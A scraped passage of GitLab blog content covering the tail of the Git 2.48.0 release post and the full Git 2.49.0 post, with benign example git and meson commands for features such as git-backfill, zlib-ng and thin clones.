So [Patrick Steinhardt](https://gitlab.com/pks-gitlab), GitLab Git Engineering Manager, implemented support for the [Meson](https://mesonbuild.com/) build\nsystem with the goal of eventually replacing the Autoconf-, CMake-, and\nmaybe the Makefile-based build systems.\n\nThe new Meson-based build system has the following advantages:\n* Allows users to easily find the available build options, something which is difficult with Makefiles and CMake\n* Has a simple syntax compared to Autoconf and CMake\n* Supports many different operating systems, compilers, and IDEs\n* Supports modern build system features like out-of-source builds\n\nHere is an example of how it can actually be used to build Git:\n\n```shell\n$ cd git             \t# go into the root of Git's source code\n$ meson setup build/ \t# setup \"build\" as a build directory\n$ cd build           \t# go into the \"build\" directory\n$ meson compile      \t# actually build Git\n$ meson test         \t# test the new build\n$ meson install      \t# install the new build\n\n```\n\nMultiple build directories can be set up using `meson setup \u003Cbuild_dir>`, and the configuration of the build inside a build directory can be viewed or changed by running `meson configure` inside the build directory.\n\nMore information on how to build Git using Meson can be found at the top of the [`meson.build` file](https://gitlab.com/gitlab-org/git/-/blob/master/meson.build) in the Git code repository. 
A\n[comparison of the different build systems](https://gitlab.com/gitlab-org/git/-/blob/master/Documentation/technical/build-systems.txt) for Git is available as part of Git's technical documentation.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Git is now memory-leak-free (as exercised by the test suite)\n\nIn our Git release blog post about the previous Git 2.47.0 release, we\ntalked about our [ongoing effort to fix all memory leaks](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/#code-refactoring-and-maintainability-improvements) surfaced by existing tests in the project. We said that prior to the Git 2.47.0 release, the project had 223 test files containing memory\nleaks, and that this had been whittled down to just 60.\n\nWe are pleased to report that the memory leaks in all 60 remaining test files have been resolved. As a result, Git, as exercised by the test suite, is now free of memory leaks. This is an important step towards the longstanding goal of “libifying” Git internal components (which means converting those components into internal libraries). It will also help with optimizing Git for memory usage.\n\nNow, any newly added test must be leak-free by default. 
It's still\npossible to have leaking tests, but the authors will have to use an\nescape hatch for that and provide good arguments why their test cannot\nbe made leak free.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Improved bundle URI checks\n\nIn our Git release blog post about the Git 2.46.0 release, we talked\nabout some [bundle URI fixes](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/#bundle-uri-fixes)\nby [Xing Xin](https://lore.kernel.org/git/pull.1730.git.1715742069966.gitgitgadget@gmail.com/).\nAfter those fixes, Xing Xin worked on making it possible for [fetches using bundles to be fully checked](https://lore.kernel.org/git/pull.1730.v8.git.1718770053.gitgitgadget@gmail.com/)\nusing the [fsck](https://git-scm.com/docs/git-fsck) mechanism like regular fetches.\n\nWhen validating regular fetches, it's possible to specify\n[different severities](https://git-scm.com/docs/git-fsck#Documentation/git-fsck.txt-fsckltmsg-idgt) for [different fsck issues](https://git-scm.com/docs/git-fsck#_fsck_messages)\nto have fine-grained handling of what is accepted and what is rejected in a specific repository. 
This wasn't possible for fetches using bundles previously.\n\nTo further increase the usefulness and safety of [bundle-uri](https://git-scm.com/docs/bundle-uri), we [addressed this problem](https://lore.kernel.org/git/20241121204119.1440773-1-jltobler@gmail.com/) so that the different severities specified for different fsck issues\nare now used when checking fetches using bundles, too.\n\nThis project was led by [Justin Tobler](https://gitlab.com/justintobler).\n\n## Add reference consistency checks\n\nIn our Git release blog post about the Git 2.47.0 release, we mentioned Jialuo She's work on\n[adding a new 'verify' subcommand](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/#new-subcommand-for-git-refs(1)) to git-refs(1) which was part of the\n[Google Summer of Code 2024](https://summerofcode.withgoogle.com/archive/2024/projects/ukm4PTEF) (GSoC 2024).\n\nIn that blog post, we said that eventually the goal was to integrate this new subcommand as part of git-fsck(1) to provide a unified way to execute repository consistency checks. Jialuo She has decided to work on that after his GSoC was over.\n\nThe result from [this effort](https://lore.kernel.org/git/ZrtrT1CPI4YUf5db@ArchLinux/)\nis that git-fsck(1) can now detect and handle a number of reference-related issues, like when the content of a reference is bad, when a symbolic link is used as a symbolic reference, or when the target of a symbolic reference doesn't point to a valid reference. 
We still need to call `git refs verify` as part of git-fsck(1), and have the former perform all non-backend-specific checks that the latter currently does, but we are closer to our end goal of a unified way to execute all refs consistency checks.\n\nThis project was led by Jialuo She.\n\n## Iterator reuse in reftables\n\nIn the [Git 2.45.0](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.45.0.txt) release, the 'reftables' format was introduced as a new backend for storing references (mostly branches and tags). If you are not yet\nfamiliar with the reftables backend, check out our previous [Git release blog post](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) where the feature was introduced and our beginner’s guide to [learn more about how reftables work](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/).\n\nSince that release, we continued to improve this backend, and we recently focused on improving its performance by [reusing some internal iterators](https://lore.kernel.org/git/cover.1730732881.git.ps@pks.im/) when reading random references. Before these changes, reading a single reference required us to create a whole new iterator, seek it to the correct location in the respective tables, and then read the next value from it, which can be quite inefficient when reading many references in quick succession. After the change we now only create a single iterator and reuse it to read multiple references, thus saving some overhead.\n\nThe result of this work is increased performance in a number of reftables-related use cases, especially a 7% speedup when creating many references in a transaction that performs many random reads. 
Furthermore, this creates the possibility for more optimizations as we can continue to reuse more state kept in the iterators.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Support for reflogs in `git-refs migrate`\n\nAfter the 'reftables' backend was introduced in Git 2.45.0 (see the section above), we worked on tooling to migrate reference backends in Git 2.46.0, which consisted of adding a new `migrate` subcommand to git-refs(1).\n\nOur article about Git 2.46.0 [talked about this work](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/#tooling-to-migrate-reference-backends) and mentioned some limitations that still existed. In particular, the article said:\n\n\"The reflogs in a repository are a component of a reference backend and would also require migration between formats. Unfortunately, the tooling is not yet capable of converting reflogs between the files and reftables backends.\"\n\nWe are pleased to report that we have [lifted this limitation in Git 2.48.0](https://lore.kernel.org/git/20241216-320-git-refs-migrate-reflogs-v4-0-d7cd3f197453@gmail.com/).\nReflogs can now also be migrated with `git refs migrate`. The migration tool is not yet capable of handling a repository with multiple worktrees, but this is the only limitation left. If you\ndon't use worktrees, you can already take advantage of the reftables backend in your existing repositories.\n\nThis project was led by [Karthik Nayak](https://gitlab.com/knayakgl).\n\n## Ref-filter optimization\n\nThe 'ref-filter' subsystem is some formatting code used by commands like `git for-each-ref`, `git branch` and `git tag` to sort, filter, format, and display information related to Git references.\n\nAs repositories grow, they can contain a huge number of references. 
This is why there is work not only on improving backends that store references, like the reftables backend (see above), but\nalso on optimizing formatting code, like the 'ref-filter' subsystem.\n\nWe recently [found a way](https://lore.kernel.org/git/d23c3e3ee7fdb49fcd05b4f2e52dd2a1cfdc10f2.1729510342.git.ps@pks.im/)\nto avoid temporarily buffering references and iterating several times on them in the ref-filter code when they should be processed in the same sorting order as the order the backends provide them. This results in memory savings and makes certain commands up to 770 times faster in some\ncases.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Read more\n\nThis blog post highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the official release announcement of the Git project. Also, check out [our previous Git release blog posts](https://about.gitlab.com/blog/tags/git/) to see other past highlights of contributions from GitLab team members.\n\n- [What’s new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [What’s new in Git 2.45.0](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/)\n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n",[751,9,267],{"slug":5364,"featured":91,"template":689},"whats-new-in-git-2-48-0","content:en-us:blog:whats-new-in-git-2-48-0.yml","Whats New In Git 2 48 
0","en-us/blog/whats-new-in-git-2-48-0.yml","en-us/blog/whats-new-in-git-2-48-0",{"_path":5370,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5371,"content":5376,"config":5382,"_id":5384,"_type":14,"title":5385,"_source":16,"_file":5386,"_stem":5387,"_extension":19},"/en-us/blog/whats-new-in-git-2-49-0",{"title":5372,"description":5373,"ogTitle":5372,"ogDescription":5373,"noIndex":6,"ogImage":5304,"ogUrl":5374,"ogSiteName":673,"ogType":674,"canonicalUrls":5374,"schema":5375},"What's new in Git 2.49.0?","Learn about the latest version of Git, including improved performance thanks to zlib-ng, a new name-hashing algorithm, and git-backfill(1).","https://about.gitlab.com/blog/whats-new-in-git-2-49-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What's new in Git 2.49.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Toon Claes\"}],\n        \"datePublished\": \"2025-03-14\",\n      }",{"title":5372,"description":5373,"authors":5377,"heroImage":5304,"date":5379,"body":5380,"category":10,"tags":5381},[5378],"Toon Claes","2025-03-14","The Git project recently released [Git 2.49.0](https://lore.kernel.org/git/xmqqfrjfilc8.fsf@gitster.g/). 
Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\nWhat's covered:\n- [git-backfill(1) and the new path-walk API](#git-backfill(1)-and-the-new-path-walk-api)\n- [Introduction of zlib-ng](#introduction-of-zlib-ng)\n- [Continued iteration on Meson](#continued-iteration-on-meson)\n- [Deprecation of .git/branches/ and .git/remotes/](#deprecation-of-.gitbranches%2F-and-.git%2Fremotes%2F)\n- [Rust bindings for libgit](#rust-bindings-for-libgit)\n- [New name-hashing algorithm](#new-name-hashing-algorithm)\n- [Promisor remote capability](#promisor-remote-capability)\n- [Thin clone using `--revision`](#thin-clone-using---revision)\n\n## git-backfill(1) and the new path-walk API\n\nWhen you [`git-clone(1)`](https://git-scm.com/docs/git-clone) a Git repository,\nyou can pass it the\n[`--filter`](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt-code--filterltfilter-specgtcode)\noption. Using this option allows you to create a _partial clone_. In a partial\nclone the server only sends a subset of reachable objects according to the given\nobject filter. For example, creating a clone with `--filter=blob:none` will not\nfetch any blobs (file contents) from the server and create a _blobless clone_.\n\nBlobless clones have all the reachable commits and trees, but no blobs. When you\nperform an operation like\n[`git-checkout(1)`](https://git-scm.com/docs/git-checkout), Git will download\nthe missing blobs to complete that operation. 
For some operations, like\n[`git-blame(1)`](https://git-scm.com/docs/git-blame), this might result in\ndownloading objects one by one, which will slow down the command drastically.\nThis performance degradation occurs because `git-blame(1)` must traverse the\ncommit history to identify which specific blobs it needs, then request each\nmissing blob from the server separately.\n\nIn Git 2.49, a new subcommand `git-backfill(1)` is introduced, which can be\nused to download missing blobs in a blobless partial clone.\n\nUnder the hood, the `git-backfill(1)` command leverages the new path-walk API, which is different from how Git generally iterates over commits. Rather than iterating over the commits one at a time and recursively visiting the trees and blobs associated with each commit, the path-walk API does traversal by path. For each path, it adds a list of associated tree objects to a stack. This stack is then processed in a depth-first order. So, instead of processing every object in commit `1` before moving to commit `2`, it will process all versions of file `A` across all commits before moving to file `B`. This approach greatly improves performance in scenarios where grouping by path is essential.\n\nLet me demonstrate its use by making a blobless clone of [`gitlab-org/git`](https://gitlab.com/gitlab-org/git):\n\n```shell\n$ git clone --filter=blob:none --bare --no-tags git@gitlab.com:gitlab-org/git.git\nCloning into bare repository 'git.git'...\nremote: Enumerating objects: 245904, done.\nremote: Counting objects: 100% (1736/1736), done.\nremote: Compressing objects: 100% (276/276), done.\nremote: Total 245904 (delta 1591), reused 1547 (delta 1459), pack-reused 244168 (from 1)\nReceiving objects: 100% (245904/245904), 59.35 MiB | 15.96 MiB/s, done.\nResolving deltas: 100% (161482/161482), done.\n```\n\nAbove, we use `--bare` to ensure Git doesn't need to download any blobs to check\nout an initial branch. 
We can verify this clone does not contain any blobs:\n\n```sh\n$ git cat-file --batch-all-objects --batch-check='%(objecttype)' | sort | uniq -c\n  83977 commit\n 161927 tree\n```\n\nIf you want to see the contents of a file in the repository, Git has to download it:\n\n```sh\n$ git cat-file -p HEAD:README.md\nremote: Enumerating objects: 1, done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 1 (from 1)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\n\n[![Build status](https://github.com/git/git/workflows/CI/badge.svg)](https://github.com/git/git/actions?query=branch%3Amaster+event%3Apush)\n\nGit - fast, scalable, distributed revision control system\n=========================================================\n\nGit is a fast, scalable, distributed revision control system with an\nunusually rich command set that provides both high-level operations\nand full access to internals.\n\n[snip]\n```\n\nAs you can see above, Git first talks to the remote repository to download the blob before\nit can display it.\n\nWhen you would like to `git-blame(1)` that file, it needs to download a lot\nmore:\n\n```sh\n$ git blame HEAD README.md\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\nremote: Counting objects: 100% (1/1), done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (1/1), 1.64 KiB | 1.64 MiB/s, done.\nremote: Enumerating objects: 1, done.\n\n[snip]\n\ndf7375d772 README.md (Ævar Arnfjörð Bjarmason 2021-11-23 17:29:09 +0100  1) [![Build 
status](https://github.com/git/git/workflows/CI/badge.svg)](https://github.com/git/git/actions?query=branch%3Amaster+event%3Apush)\n5f7864663b README.md (Johannes Schindelin \t2019-01-29 06:19:32 -0800  2)\n28513c4f56 README.md (Matthieu Moy        \t2016-02-25 09:37:29 +0100  3) Git - fast, scalable, distributed revision control system\n28513c4f56 README.md (Matthieu Moy        \t2016-02-25 09:37:29 +0100  4) =========================================================\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  5)\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  6) Git is a fast, scalable, distributed revision control system with an\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  7) unusually rich command set that provides both high-level operations\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  8) and full access to internals.\n556b6600b2 README\t(Nicolas Pitre       \t2007-01-17 13:04:39 -0500  9)\n\n[snip]\n```\n\nWe've truncated the output, but as you can see, Git goes to the server for each\nrevision of that file separately. That's really inefficient. 
With\n`git-backfill(1)` we can ask Git to download all blobs:\n\n```shell\n$ git backfill\nremote: Enumerating objects: 50711, done.\nremote: Counting objects: 100% (15438/15438), done.\nremote: Compressing objects: 100% (708/708), done.\nremote: Total 50711 (delta 15154), reused 14730 (delta 14730), pack-reused 35273 (from 1)\nReceiving objects: 100% (50711/50711), 11.62 MiB | 12.28 MiB/s, done.\nResolving deltas: 100% (49154/49154), done.\nremote: Enumerating objects: 50017, done.\nremote: Counting objects: 100% (10826/10826), done.\nremote: Compressing objects: 100% (634/634), done.\nremote: Total 50017 (delta 10580), reused 10192 (delta 10192), pack-reused 39191 (from 1)\nReceiving objects: 100% (50017/50017), 12.17 MiB | 12.33 MiB/s, done.\nResolving deltas: 100% (48301/48301), done.\nremote: Enumerating objects: 47303, done.\nremote: Counting objects: 100% (7311/7311), done.\nremote: Compressing objects: 100% (618/618), done.\nremote: Total 47303 (delta 7021), reused 6693 (delta 6693), pack-reused 39992 (from 1)\nReceiving objects: 100% (47303/47303), 40.84 MiB | 15.26 MiB/s, done.\nResolving deltas: 100% (43788/43788), done.\n```\n\nThis backfills all blobs, turning the blobless clone into a full clone:\n\n```shell\n$ git cat-file --batch-all-objects --batch-check='%(objecttype)' | sort | uniq -c\n 148031 blob\n  83977 commit\n 161927 tree\n```\n\nThis [project](https://lore.kernel.org/git/pull.1820.v3.git.1738602667.gitgitgadget@gmail.com/)\nwas led by [Derrick Stolee](https://stolee.dev/) and was merged with\n[e565f37553](https://gitlab.com/gitlab-org/git/-/commit/e565f3755342caf1d21e22359eaf09ec11d8c0ae).\n\n## Introduction of zlib-ng\n\nAll objects in the `.git/` folder are compressed by Git using [`zlib`](https://zlib.net/). `zlib` is the reference implementation for the [RFC\n1950](https://datatracker.ietf.org/doc/html/rfc1950): ZLIB Compressed Data\nFormat. 
Created in 1995, `zlib` has a long history and is incredibly\nportable, even supporting many systems that predate the Internet. Because of its\nwide support of architectures and compilers, it has limitations in what it is\ncapable of.\n\nThe fork [`zlib-ng`](https://github.com/zlib-ng/zlib-ng) was created to\naccommodate the limitations. `zlib-ng` aims to be optimized for modern\nsystems. This fork drops support for legacy systems and instead brings in\npatches for Intel optimizations, some Cloudflare optimizations, and a couple\nother smaller patches.\n\nThe `zlib-ng` library itself provides a compatibility layer for `zlib`. The\ncompatibility layer allows `zlib-ng` to be a drop-in replacement for `zlib`, but\nthat layer is not available on all Linux distributions. In Git 2.49:\n\n- A compatibility layer was added to the Git project.\n- Build options were added both to the [`Makefile`](https://gitlab.com/gitlab-org/git/-/blob/b9d6f64393275b505937a8621a6cc4875adde8e0/Makefile#L186-187)\n  and [Meson Build file](https://gitlab.com/gitlab-org/git/-/blob/b9d6f64393275b505937a8621a6cc4875adde8e0/meson.build#L795-811).\n\nThese additions make it easier to benefit from the performance improvements of\n`zlib-ng`.\n\nIn local benchmarks, we've seen a ~25% speedup when using `zlib-ng` instead of `zlib`. And we're in the process of rolling out these changes to\nGitLab.com, too.\n\nIf you want to benefit from the gains of `zlib-ng`, first verify if Git\non your machine is already using `zlib-ng` by running\n`git version --build-options`:\n\n```shell\n$ git version --build-options\ngit version 2.47.1\ncpu: x86_64\nno commit associated with this build\nsizeof-long: 8\nsizeof-size_t: 8\nshell-path: /bin/sh\nlibcurl: 8.6.0\nOpenSSL: OpenSSL 3.2.2 4 Jun 2024\nzlib: 1.3.1.zlib-ng\n```\n\nIf the last line includes `zlib-ng` then your Git is already built\nusing the faster `zlib` variant. 
If not, you can either:\n\n- Ask the maintainer of the Git package you are using to include `zlib-ng` support.\n- Build Git yourself from source.\n\nThese [changes](https://gitlab.com/gitlab-org/git/-/commit/9d0e81e2ae3bd7f6d8a655be53c2396d7af3d2b0)\nwere [introduced](https://lore.kernel.org/git/20250128-b4-pks-compat-drop-uncompress2-v4-0-129bc36ae8f5@pks.im/)\nby [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Continued iteration on Meson\n\nIn our article about the Git 2.48 release,\nwe touched on [the introduction of the Meson build system](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/#meson-build-system). [Meson](https://en.wikipedia.org/wiki/Meson_(software)) is\na build automation tool used by the Git project that at some point might replace [Autoconf](https://en.wikipedia.org/wiki/Autoconf),\n[CMake](https://en.wikipedia.org/wiki/CMake), and maybe even\n[Make](https://en.wikipedia.org/wiki/Make_(software)).\n\nDuring this release cycle, work continued on using Meson, adding various missing\nfeatures and stabilization fixes:\n\n  - [Improved test coverage for\n\tCI](https://lore.kernel.org/git/20250122-b4-pks-meson-additions-v3-0-5a51eb5d3dcd@pks.im/)\n\twas merged in\n\t[72f1ddfbc9](https://gitlab.com/gitlab-org/git/-/commit/72f1ddfbc95b47c6011bb423e6947418d1d72709).\n  - [Bits and pieces to use Meson in `contrib/`](https://lore.kernel.org/git/20250219-b4-pks-meson-contrib-v2-0-1ba5d7fde0b9@pks.im/)\n\twere merged in\n\t[2a1530a953](https://gitlab.com/gitlab-org/git/-/commit/2a1530a953cc4d2ae62416db86c545c7ccb73ace).\n  - [Assorted fixes and improvements to the build procedure based on\n\tmeson](https://lore.kernel.org/git/20250226-b4-pks-meson-improvements-v3-0-60c77cf673ae@pks.im/)\n\twere merged in\n\t[ab09eddf60](https://gitlab.com/gitlab-org/git/-/commit/ab09eddf601501290b5c719574fbe6c02314631f).\n  - [Making Meson aware of 
building\n\t`git-subtree(1)`](https://lore.kernel.org/git/20250117-b4-pks-build-subtree-v1-0-03c2ed6cc42e@pks.im/)\n\twas merged in\n\t[3ddeb7f337](https://gitlab.com/gitlab-org/git/-/commit/3ddeb7f3373ae0e309d9df62ada24375afa456c7).\n  - [Learn Meson to generate HTML documentation\n\tpages](https://lore.kernel.org/git/20241227-b4-pks-meson-docs-v2-0-f61e63edbfa1@pks.im/)\n\twas merged in\n\t[1b4e9a5f8b](https://gitlab.com/gitlab-org/git/-/commit/1b4e9a5f8b5f048972c21fe8acafe0404096f694).\n\nAll these efforts were carried out by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Deprecation of .git/branches/ and .git/remotes/\n\nYou are probably aware of the existence of the `.git` directory, and what is\ninside. But have you ever heard about the sub-directories `.git/branches/` and\n`.git/remotes/`? As you might know, references to branches are stored in\n`.git/refs/heads/`, so that's not what `.git/branches/` is for, and what about\n`.git/remotes/`?\n\nWay back in 2005, [`.git/branches/`](https://git-scm.com/docs/git-fetch#_named_file_in_git_dirbranches)\nwas introduced to store a shorthand name for a remote, and a few months later they were\nmoved to [`.git/remotes/`](https://git-scm.com/docs/git-fetch#_named_file_in_git_dirremotes).\nIn [2006](https://lore.kernel.org/git/Pine.LNX.4.63.0604301520460.2646@wbgn013.biozentrum.uni-wuerzburg.de/),\n[`git-config(1)`](https://git-scm.com/docs/git-config) learned to store\n[remotes](https://git-scm.com/docs/git-config#Documentation/git-config.txt-remoteltnamegturl).\nThis has become the standard way to configure remotes and, in 2011, the\ndirectories `.git/branches/` and `.git/remotes/` were\n[documented](https://gitlab.com/git-scm/git/-/commit/3d3d282146e13f2d7f055ad056956fd8e5d7ed29#e615263aaf131d42be8b0d0888ebd3fec954c6c9_132_124)\nas being \"legacy\" and no longer used in modern repositories.\n\nIn 2024, the document [BreakingChanges](https://git-scm.com/docs/BreakingChanges)\nwas started to outline breaking 
changes for the next major version of Git\n(v3.0). While this release is not planned to happen any time soon, this document\nkeeps track of changes that are expected to be part of that release.\nIn [8ccc75c245](https://gitlab.com/git-scm/git/-/commit/8ccc75c2452b5814d2445d60d54266293ca48674),\nthe use of the directories `.git/branches/` and `.git/remotes/` was added to\nthis document and that officially marks them as deprecated and to be removed in\nGit 3.0.\n\nThanks to [Patrick Steinhardt](https://gitlab.com/pks-gitlab) for\n[formalizing this deprecation](https://lore.kernel.org/git/20250122-pks-remote-branches-deprecation-v4-5-5cbf5b28afd5@pks.im/).\n\n## Rust bindings for libgit\n\nWhen compiling Git, an internal library `libgit.a` is made. This library\ncontains some of the core functionality of Git.\n\nWhile this library (and most of Git) is written in C, in Git 2.49 bindings were\nadded to make some of these functions available in Rust. To achieve this, two\nnew Cargo packages were created: `libgit-sys` and `libgit-rs`. These packages\nlive in the [`contrib/`](https://gitlab.com/gitlab-org/git/-/tree/master/contrib) subdirectory in the Git source tree.\n\nIt's pretty\n[common](https://doc.rust-lang.org/cargo/reference/build-scripts.html#-sys-packages)\nto split out a library into two packages when a [Foreign Function\nInterface](https://en.wikipedia.org/wiki/Foreign_function_interface) is used.\nThe `libgit-sys` package provides the pure interface to C functions and links to\nthe native `libgit.a` library. The package `libgit-rs` provides a high-level\ninterface to the functions in `libgit-sys` with a feel that is more idiomatic to\nRust.\n\nSo far, the functionality in these Rust packages is very limited. 
It only\nprovides an interface to interact with the `git-config(1)`.\n\nThis initiative was led by [Josh Steadmon](https://lore.kernel.org/git/8793ff64a7f6c4c04dd03b71162a85849feda944.1738187176.git.steadmon@google.com/) and was merged with [a4af0b6288](https://gitlab.com/gitlab-org/git/-/commit/a4af0b6288e25eb327ae9018cee09def9e43f1cd).\n\n## New name-hashing algorithm\n\nThe Git object database in `.git/` stores most of its data in packfiles. And\npackfiles are also used to submit objects between Git server and client over the\nwire.\n\nYou can read all about the format at\n[`gitformat-pack(5)`](https://git-scm.com/docs/gitformat-pack). One important\naspect of the packfiles is delta-compression. With delta-compression not every\nobject is stored as-is, but some objects are saved as a _delta_ of another\n_base_. So instead of saving the full contents of the objects, changes compared\nto another object are stored.\n\nWithout going into the details of how these deltas are calculated or stored, you\ncan imagine that it is important to group files together that are very similar. In\nv2.48 and earlier, Git looked at the last 16 characters of the path name to\ndetermine whether blobs might be similar. This algorithm is named version `1`.\n\nIn Git 2.49, version `2` is available. This is an iteration on version `1`, but\nmodified so the effect of the parent directory is reduced. 
You can specify the\nname-hash algorithm version you want to use with option `--name-hash-version` of\n[`git-repack(1)`](https://git-scm.com/docs/git-repack).\n\n[Derrick Stolee](https://stolee.dev/), who drove this project, did some\ncomparison in resulting packfile size after running `git repack -adf\n--name-hash-version=\u003Cn>`:\n\n| Repo                                          \t| Version 1 size   | Version 2 size |\n|---------------------------------------------------|-----------|---------|\n| [fluentui](https://github.com/microsoft/fluentui) | 440 MB \t| 161 MB   |\n| Repo B                                        \t| 6,248 MB   | 856 MB   |\n| Repo C                                        \t| 37,278 MB  | 6,921 MB |\n| Repo D                                        \t| 131,204 MB | 7,463 MB |\n\nYou can read more of the details in the [patch\nset](https://lore.kernel.org/git/pull.1823.v4.git.1738004554.gitgitgadget@gmail.com/),\nwhich is merged in\n[aae91a86fb](https://gitlab.com/gitlab-org/git/-/commit/aae91a86fb2a71ff89a71b63ccec3a947b26ca51).\n\n## Promisor remote capability\n\nIt's known that Git isn't great in dealing with large files. There are some\nsolutions to this problem, like [Git LFS](https://git-lfs.com/), but there are\nstill some shortcomings. To give a few:\n\n- With Git LFS the user has to configure which files to put in LFS. The server has\n  no control about that and has to serve all files.\n- Whenever a file is committed to the repository, there is no way to get it out\n  again without rewriting history. This is annoying, especially for large files,\n  because they are stuck for eternity.\n- Users cannot change their mind on which files to put into Git LFS.\n- A tool like Git LFS requires significant effort to set up, learn, and use\n  correctly.\n\nFor some time, Git has had the concept of promisor remotes. 
This feature can be used to deal with large files, and in Git 2.49 this feature took a step forward.\n\nThe idea for the new “promisor-remote” capability is relatively simple: Instead of sending all\nobjects itself, a Git server can tell the Git client \"Hey, go download these\nobjects from _XYZ_\". _XYZ_ would be a promisor remote.\n\nGit 2.49 enables the server to advertise the information of the promisor remote\nto the client. This change is an extension to\n[`gitprotocol-v2`](https://git-scm.com/docs/gitprotocol-v2). While the server\nand the client are transmitting data to each other, the server can send names and URLs of the promisor remotes it knows\nabout.\n\nSo far, the client is not using the promisor remote info it gets from the server during clone, so all\nobjects are still transmitted from the remote the clone initiated from. We are planning to continue work on this feature, making it use promisor remote info from the server, and making it easier to use.\n\nThis [patch\nset](https://lore.kernel.org/git/20250218113204.2847463-1-christian.couder@gmail.com/)\nwas submitted by [Christian Couder](https://gitlab.com/chriscool) and merged\nwith\n[2c6fd30198](https://gitlab.com/gitlab-org/git/-/commit/2c6fd30198187c928cbf927802556908c381799c).\n\n## Thin clone using `--revision`\n\nA new `--revision` option was added to\n[`git-clone(1)`](https://git-scm.com/docs/git-clone). This enables you to create\na thin clone of a repository that only contains the history of the given\nrevision. The option is similar to `--branch`, but accepts a ref name (like\n`refs/heads/main`, `refs/tags/v1.0`, and `refs/merge-requests/123`) or a\nhexadecimal commit object ID. The difference from `--branch` is that it does not\ncreate a tracking branch and detaches `HEAD`. This means it's not suited if you\nwant to contribute back to that branch.\n\nYou can use `--revision` in combination with `--depth` to create a very minimal\nclone. A suggested use-case is for automated testing. 
When you have a CI system\nthat needs to check out a branch (or any reference) to perform autonomous\ntesting on the source code, having a minimal clone is all you need.\n\nThis\n[change](https://gitlab.com/gitlab-org/git/-/commit/5785d9143bcb3ef19452a83bc2e870ff3d5ed95a)\nwas\n[driven](https://lore.kernel.org/git/20250206-toon-clone-refs-v7-0-4622b7392202@iotcl.com/)\nby [Toon Claes](https://gitlab.com/toon).\n\n# Read more\n- [What’s new in Git 2.48.0?](https://about.gitlab.com/blog/whats-new-in-git-2-48-0/)\n- [What’s new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)",[267,9,751],{"slug":5383,"featured":91,"template":689},"whats-new-in-git-2-49-0","content:en-us:blog:whats-new-in-git-2-49-0.yml","Whats New In Git 2 49 0","en-us/blog/whats-new-in-git-2-49-0.yml","en-us/blog/whats-new-in-git-2-49-0",{"_path":5389,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5390,"content":5396,"config":5401,"_id":5403,"_type":14,"title":5404,"_source":16,"_file":5405,"_stem":5406,"_extension":19},"/en-us/blog/where-to-donate-your-devops-skills",{"title":5391,"description":5392,"ogTitle":5391,"ogDescription":5392,"noIndex":6,"ogImage":5393,"ogUrl":5394,"ogSiteName":673,"ogType":674,"canonicalUrls":5394,"schema":5395},"Where to donate your DevOps skills","Want to feel great and help fill the DevOps talent pipeline? 
